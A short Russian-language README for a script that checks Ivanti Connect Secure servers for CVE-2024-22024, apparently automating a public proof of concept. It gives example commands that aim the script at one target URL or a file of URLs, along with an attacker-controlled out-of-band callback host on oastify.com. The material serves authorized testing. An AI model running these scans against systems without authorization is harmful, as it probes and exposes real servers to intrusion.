
Проверка на наличие уязвимости CVE-2024-22024 в Ivanti Connect Secure
Проверка на уязвимость CVE-2024-22024 в Ivanti Connect Secure
[!WARNING] ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ.
-u или --target_url: Целевой URL Ivanti Connect Secure (ICS) или файл со списком URL.
-c или --attacker_url: URL атакующего (сгенерируйте с помощью Burp Collaborator, ngrok или используя уникальный URL с Webhook.site)
-t или --timeout: Тайм-аут в секундах для запроса (по умолчанию 3 секунды)
Тестирование одного URL:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
Тестирование списка URL:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
Использование другого тайм-аута (5 секунд):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
Тому, кто обнаружил уязвимость... Я просто прочитал PoC и автоматизировал это.